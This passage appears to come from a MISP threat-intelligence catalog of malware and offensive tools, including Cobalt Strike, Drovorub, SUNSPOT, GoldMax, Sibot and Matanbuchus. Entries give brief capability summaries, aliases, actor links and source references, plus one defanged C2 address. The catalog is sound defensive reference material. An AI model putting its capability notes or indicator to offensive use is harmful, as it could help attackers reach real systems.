The tag is: *misp-galaxy:tool="DenesRAT"*

DenesRAT is also known as:

- **METALJACK**

**Table 6690. Table References**

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<tbody>
<tr>
<td><a href="http://baijiahao.baidu.com/s?id=166149803094117519">http://baijiahao.baidu.com/s?id=166149803094117519</a></td>
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**Sedkit**

Sednit's Exploit-Kit

The tag is: *misp-galaxy:tool="Sedkit"*

Sedkit is also known as:

**Table 6691. Table References**

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<tr>
<td><a href="https://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/">https://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2016/10/20/new-eset-research-paper-puts-sednit-under-the-microscope/">https://www.welivesecurity.com/2016/10/20/new-eset-research-paper-puts-sednit-under-the-microscope/</a></td>
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**Covenant**

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.

The tag is: *misp-galaxy:tool="Covenant"*

Covenant is also known as:

**Table 6692. Table References**

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**Cobalt Strike**

Cobalt Strike is a post-exploitation framework.

The tag is: `misp-galaxy:tool="Cobalt Strike"`

Cobalt Strike is also known as:

Table 6693. Table References

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<tbody>
<tr>
<td><a href="https://www.cobaltstrike.com">https://www.cobaltstrike.com</a></td>
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**metasploit**

Penetration testing framework.

The tag is: `misp-galaxy:tool="metasploit"`

metasploit is also known as:

Table 6694. Table References

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<tr>
<td><a href="https://www.metasploit.com">https://www.metasploit.com</a></td>
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</table>

**CrackMapExec**

A swiss army knife for pentesting networks.

The tag is: `misp-galaxy:tool="CrackMapExec"`

CrackMapExec is also known as:

Table 6695. Table References

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<tr>
<td><a href="https://github.com/byt3bl33d3r/CrackMapExec">https://github.com/byt3bl33d3r/CrackMapExec</a></td>
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</table>

**WellMess**

Wellmess is a Remote Access Trojan written in Golang and also have a .NET version

The tag is: `misp-galaxy:tool="WellMess"`
WellMess is also known as:

Table 6696. Table References

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**WellMail**

WellMail is a lightweight tool designed to run commands or scripts with the results being sent to a hardcoded Command and Control (C2) server.

The tag is: `misp-galaxy:tool="WellMail"`

WellMail is also known as:

Table 6697. Table References

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</table>

**Drovorub**

Drovorub is a Linux malware toolset consisting of an implant coupled with a kernel module rootkit, a file transfer and port forwarding tool, and a Command and Control (C2) server.

The tag is: `misp-galaxy:tool="Drovorub"`

Drovorub is also known as:

Table 6698. Table References

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<tbody>
<tr>
<td><a href="https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF">https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF</a></td>
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**IsErIk**

The adware DealPly (sometimes also referred to as IsErIk) and malicious Chrome extension ManageX, for instance, can come bundled under the guise of a legitimate installer and other potentially unwanted applications (PUAs). Because various write-ups cover Dealply or IsErik separately, the technical discussion and representation of both are discussed separately.

The tag is: `misp-galaxy:tool="IsErIk"`
IsErIk is also known as:

- DealPly
- ManageX

**Table 6699. Table References**

**Links**


## Vatet

Attackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.

The tag is: `misp-galaxy:tool="Vatet"`

**Table 6700. Table References**

**Links**


## ConfuserEx

ConfuserEx is a common .NET packer/protector used to obfuscate .NET assemblies and confuse the decompilation process. According to the official site: ConfuserEx is an free, open-source protector for .NET applications. It is the successor of Confuser project. ConfuserEx supports .NET Framework from 2.0 - 4.5 and Mono (and other .NET platforms if enough request!). It supports most of the protections you’ll find in commercial protectors, and some more!

The tag is: `misp-galaxy:tool="ConfuserEx"`

**Table 6701. Table References**

**Links**

https://yck1509.github.io/ConfuserEx/

**Beds Protector**

Beds Protector is a common .NET packer/protector. It is a mod of ConfuserEx, which is another common .NET packer/protector. It is commonly used to obfuscate .NET assemblies and confuse the decompilation process. The latest available version is Beds Protector v1.4.1

The tag is: `misp-galaxy:tool=\"Beds Protector\"`

**Table 6702. Table References**

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**HyperBro**

HyperBro Trojan was used as last-stage in-memory remote administration tool (RAT).

The tag is: `misp-galaxy:tool=\"HyperBro\"`

**Table 6703. Table References**

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**SUNSPOT**

SUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.

The tag is: `misp-galaxy:tool=\"SUNSPOT\"`

SUNSPOT has relationships with:

- dropped: `misp-galaxy:backdoor=\"SUNBURST\"` with `estimative-language:likelihood-probability=\"likely\"`

**Table 6704. Table References**

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<tbody>
<tr>
<td><a href="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/">https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/</a></td>
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**Caterpillar WebShell**

The tag is: `misp-galaxy:tool=\"Caterpillar WebShell\"`

**Table 6705. Table References**

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<td><a href="https://www.clearskysec.com/cedar/">https://www.clearskysec.com/cedar/</a></td>
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</table>
**P.A.S. webshell**

The P.A.S. webshell was developed by an ukrainian student, Jaroslav Volodimirovich Panchenko, who used the nick-name Profexer. It was developed in PHP and features a characteristic password-based encryption. This tool was available through a form on his website, where a user had to provide a password to receive a custom webshell. The form suggested a donation to the developer. It was commonly used, including during a WORDPRESS website attack.

The tag is: *misp-galaxy:tool=*"P.A.S. webshell"

P.A.S. webshell is also known as:

- Fobushell

*Table 6706. Table References*

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<tr>
<td><a href="https://us-cert.cisa.gov/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity">https://us-cert.cisa.gov/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity</a></td>
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</table>

**Exaramel**

Exaramel is a backdoor first publicly reported by ESET in 2018. Two samples were identified, one targeting the WINDOWS operating system and the other targeting LINUX operating systems.

The tag is: *misp-galaxy:tool=*"Exaramel"

*Table 6707. Table References*

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**RDAT**

RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.

The tag is: *misp-galaxy:tool=*"RDAT"

*Table 6708. Table References*

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<td><a href="https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/">https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/</a></td>
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</table>
TEARDROP

Loader used in hands-on-keyboard techniques that attackers employed on compromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders.

The tag is: misp-galaxy:tool="TEARDROP"

TEARDROP has relationships with:

- used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"
- variant-of: misp-galaxy:tool="Raindrop" with estimative-language:likelihood-probability="likely"

Table 6709. Table References

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GoldMax

Written in Go, GoldMax acts as command-and-control backdoor for the actor. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running. GoldMax establishes a secure session key with its C2 and uses that key to securely communicate with the C2, preventing non-GoldMax-initiated connections from receiving and identifying malicious traffic. The C2 can send commands to be launched for various operations, including native OS commands, via pseudo-randomly generated cookies. The hardcoded cookies are unique to each implant, appearing to be random strings but mapping to victims and operations on the actor side.

The tag is: misp-galaxy:tool="GoldMax"

GoldMax has relationships with:

- used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Table 6710. Table References

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Raindrop

Loader used in hands-on-keyboard techniques that attackers employed on compromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders.

The tag is: *misp-galaxy:tool="Raindrop"

Raindrop has relationships with:

- used-by: *misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"
- variant-of: *misp-galaxy:tool="TEARDROP" with estimative-language:likelihood-probability="likely"

GoldFinder

Tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g., `hxxps://185[.]225[.]69[.]69/`) and logs the HTTP response to a plaintext log file (e.g., `loglog.txt` created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file:

The tag is: *misp-galaxy:tool="GoldFinder"

GoldFinder has relationships with:

- used-by: *misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Sibot

Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript
file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk. The VBScript is then run via a scheduled task.

The tag is: **misp-galaxy:tool="Sibot"**

Sibot has relationships with:

- **used-by:** misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

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<td><a href="https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/">https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/</a></td>
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**Matanbuchus**

Matanbuchus is a loader promoted by BelialDemon. It can launch an EXE or DLL file in memory, leverage scptasks.exe to add or modify task schedules, and launch custom PowerShell commands, among other capabilities. Attackers use a Microsoft Excel document as the initial vector to drop the Matanbuchus Loader DLL.

The tag is: **misp-galaxy:tool="Matanbuchus"**

<table>
<thead>
<tr>
<th>Table 6714. Table References</th>
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<tr>
<td><strong>Links</strong></td>
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<td><a href="https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/">https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/</a></td>
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